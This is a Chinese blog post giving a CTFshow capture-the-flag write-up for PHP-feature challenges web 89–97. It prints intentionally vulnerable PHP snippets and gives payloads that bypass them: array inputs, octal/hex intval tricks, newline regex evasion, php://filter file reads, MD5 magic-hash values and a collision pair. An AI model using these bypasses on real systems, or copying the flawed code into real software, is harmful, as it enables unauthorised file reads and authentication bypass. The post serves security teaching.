<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>CTFshow php特性 | 惜缘怀古的博客</title><meta name="keywords" content="惜缘怀古，博客"><meta name="author" content="惜缘怀古"><meta name="copyright" content="惜缘怀古"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="web 8912345678910111213141516&lt;?phpinclude(&quot;flag.php&quot;);highlight_file(__FILE__);if(isset($_GET[&amp;#x27;num&amp;#x27;]))&amp;#123;    $num &#x3D; $_GET[&amp;#x27;num&amp;#x27;];    if(preg_match(&quot;&#x2F;[0-9]&#x2F;&amp;quo">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFshow php特性">
<meta property="og:url" content="https://xiyuanhuaigu.gitee.io/2022/08/07/CTFshow%20php%E7%89%B9%E6%80%A7/index.html">
<meta property="og:site_name" content="惜缘怀古的博客">
<meta property="og:description" content="web 8912345678910111213141516&lt;?phpinclude(&quot;flag.php&quot;);highlight_file(__FILE__);if(isset($_GET[&amp;#x27;num&amp;#x27;]))&amp;#123;    $num &#x3D; $_GET[&amp;#x27;num&amp;#x27;];    if(preg_match(&quot;&#x2F;[0-9]&#x2F;&amp;quo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/3e343dca04a36c15d52d957e8f6990d0608d9e36_raw.jpg">
<meta property="article:published_time" content="2022-08-07T09:55:55.000Z">
<meta property="article:modified_time" content="2022-09-15T10:12:58.218Z">
<meta property="article:author" content="惜缘怀古">
<meta property="article:tag" content="惜缘怀古，博客">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/3e343dca04a36c15d52d957e8f6990d0608d9e36_raw.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://xiyuanhuaigu.gitee.io/2022/08/07/CTFshow%20php%E7%89%B9%E6%80%A7/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'CTFshow php特性',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-09-15 18:12:58'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if (GLOBAL_CONFIG_SITE.isHome && /iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 5.4.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/2.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">66</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div></div><hr/></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/3e343dca04a36c15d52d957e8f6990d0608d9e36_raw.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">惜缘怀古的博客</a></span><div id="menus"><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">CTFshow php特性</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-08-07T09:55:55.000Z" title="发表于 2022-08-07 17:55:55">2022-08-07</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-09-15T10:12:58.218Z" title="更新于 2022-09-15 18:12:58">2022-09-15</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">9.6k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>45分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="CTFshow php特性"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="web-89"><a href="#web-89" class="headerlink" title="web 89"></a>web 89</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[0-9]/&quot;</span>, <span class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-intval-function.html">intval函数(获取变量的整数型)</a>：如果他的值为一个数组，只要数组里面有值，那么不论值的数量，返回值都为1，空数组则返回0</p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-preg_match.html">preg_match() 函数</a></p>
<p>利用数组绕过正则匹配，使其返回值发生错误而为false</p>
<p><code>payload：?num[]=1</code></p>
<h1 id="web-90"><a href="#web-90" class="headerlink" title="web 90"></a>web 90</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>===<span class="string">&quot;4476&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)===<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> intval(<span class="variable">$num</span>,<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>intval($num,0)：</p>
<p>如果 base 是 0，通过检测 var 的格式来决定使用的进制：</p>
<pre><code>如果字符串包括了 “0x” (或 “0X”) 的前缀，使用 16 进制 (hex)；否则，
如果字符串以 “0” 开始，使用 8 进制(octal)；否则，
将使用 10 进制 (decimal)。
</code></pre>
<p><code>payload：?num=010574 </code>这里我以0开始，意思就是后面的数字将被以8进制的形式读取</p>
<h1 id="web-91"><a href="#web-91" class="headerlink" title="web 91"></a>web 91</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^php$/im&#x27;</span>, <span class="variable">$a</span>))&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^php$/i&#x27;</span>, <span class="variable">$a</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;hacker&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;nonononono&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>考察点：正则表达式修饰符<br> 拓展</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">i </span><br><span class="line">不区分(ignore)大小写</span><br><span class="line"></span><br><span class="line">m</span><br><span class="line">多(more)行匹配</span><br><span class="line">若存在换行\n并且有开始^或结束$符的情况下，</span><br><span class="line">将以换行为分隔符，逐行进行匹配</span><br><span class="line">$str = &quot;abc\nabc&quot;;</span><br><span class="line">$preg = &quot;/^abc$/m&quot;;</span><br><span class="line">preg_match($preg, $str,$matchs);</span><br><span class="line">这样其实是符合正则表达式的，因为匹配的时候 先是匹配换行符前面的，接着匹配换行符后面的，两个都是abc所以可以通过正则表达式。</span><br><span class="line"></span><br><span class="line">s</span><br><span class="line">特殊字符圆点 . 中包含换行符</span><br><span class="line">默认的圆点 . 是匹配除换行符 \n 之外的任何单字符，加上s之后, .包含换行符</span><br><span class="line">$str = &quot;abggab\nacbs&quot;;</span><br><span class="line">$preg = &quot;/b./s&quot;;</span><br><span class="line">preg_match_all($preg, $str,$matchs);</span><br><span class="line">这样匹配到的有三个 bg b\n bs</span><br><span class="line"></span><br><span class="line">A</span><br><span class="line">强制从目标字符串开头匹配;</span><br><span class="line"></span><br><span class="line">D</span><br><span class="line">如果使用$限制结尾字符,则不允许结尾有换行; </span><br><span class="line"></span><br><span class="line">e</span><br><span class="line">配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行; </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>满足第一个匹配：?cmd=%0aphp，同时不满足第二匹配(固定字符串”php”)</p>
<h1 id="web-92"><a href="#web-92" class="headerlink" title="web 92"></a>web 92</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> intval(<span class="variable">$num</span>,<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>payload：</p>
<p><code>?num=0x117c</code></p>
<p>这里我采用的是16进制绕过</p>
<h1 id="web93"><a href="#web93" class="headerlink" title="web93"></a>web93</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[a-z]/i&quot;</span>, <span class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> intval(<span class="variable">$num</span>,<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里直接八进制绕过?num=010574</p>
<h1 id="web94"><a href="#web94" class="headerlink" title="web94"></a>web94</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>===<span class="string">&quot;4476&quot;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[a-z]/i&quot;</span>, <span class="variable">$num</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!strpos(<span class="variable">$num</span>, <span class="string">&quot;0&quot;</span>))&#123; <span class="comment">// 在这个地方需要返回的值不能为0，也就是说0不能在第一位</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)===<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.strpos.php">strpos函数详解</a></p>
<p>所以?num=4476.0</p>
<h1 id="web-95"><a href="#web-95" class="headerlink" title="web 95"></a>web 95</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[a-z]|\./i&quot;</span>, <span class="variable">$num</span>))&#123;<span class="comment">// 点匹配没了</span></span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!strpos(<span class="variable">$num</span>, <span class="string">&quot;0&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no!!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>,<span class="number">0</span>)===<span class="number">4476</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>利用八进制开头加号代替空格绕过?num=+010574</p>
<h1 id="web-96"><a href="#web-96" class="headerlink" title="web 96"></a>web 96</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;u&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;u&#x27;</span>]==<span class="string">&#x27;flag.php&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;no no no&quot;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        highlight_file(<span class="variable">$_GET</span>[<span class="string">&#x27;u&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>paylaod:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./flag.php</span><br><span class="line">/var/www/html/flag.php</span><br><span class="line">php://filter/resource=flag.php</span><br></pre></td></tr></table></figure>



<h1 id="web-97"><a href="#web-97" class="headerlink" title="web 97"></a>web 97</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;b&#x27;</span>])) &#123;</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>] != <span class="variable">$_POST</span>[<span class="string">&#x27;b&#x27;</span>])</span><br><span class="line"><span class="keyword">if</span> (md5(<span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>]) === md5(<span class="variable">$_POST</span>[<span class="string">&#x27;b&#x27;</span>]))</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">&#x27;Wrong.&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>php中hash比较缺陷</p>
<p><a target="_blank" rel="noopener" href="https://crypto.stackexchange.com/questions/1434/are-there-two-known-strings-which-have-the-same-md5-hash-value">md5强碰撞收集</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/EC_Carrot/article/details/109525162">【PHP】MD5比较漏洞 弱比较、强比较、强碰撞</a></p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/c9089fd5b1ba">MD5碰撞的一些例子</a></p>
</blockquote>
<p>md5弱类型比较可以直接数组绕过，其结果都会转换为null</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a[]=1&amp;b[]=2</span><br></pre></td></tr></table></figure>

<p>如果进行了string强制转类型后，则不再接受数组</p>
<p>弱碰撞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$a=(string)$a;</span><br><span class="line">$b=(string)$b;</span><br><span class="line">if(  ($a!==$b) &amp;&amp; (md5($a)==md5($b)) )&#123;</span><br><span class="line">echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">md5弱比较，为0e开头的会被识别为科学记数法，结果均为0，所以只需找两个md5后都为0e开头且0e后面均为数字的值即可。</span><br><span class="line">payload: a=QNKCDZO&amp;b=240610708</span><br></pre></td></tr></table></figure>

<p>强碰撞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$a=(string)$a;</span><br><span class="line">$b=(string)$b;</span><br><span class="line">if(  ($a!==$b) &amp;&amp; (md5($a)===md5($b)) )&#123;</span><br><span class="line">echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">这时候需要找到两个真正的md5值相同数据</span><br><span class="line"></span><br><span class="line">a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&amp;b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2</span><br></pre></td></tr></table></figure>

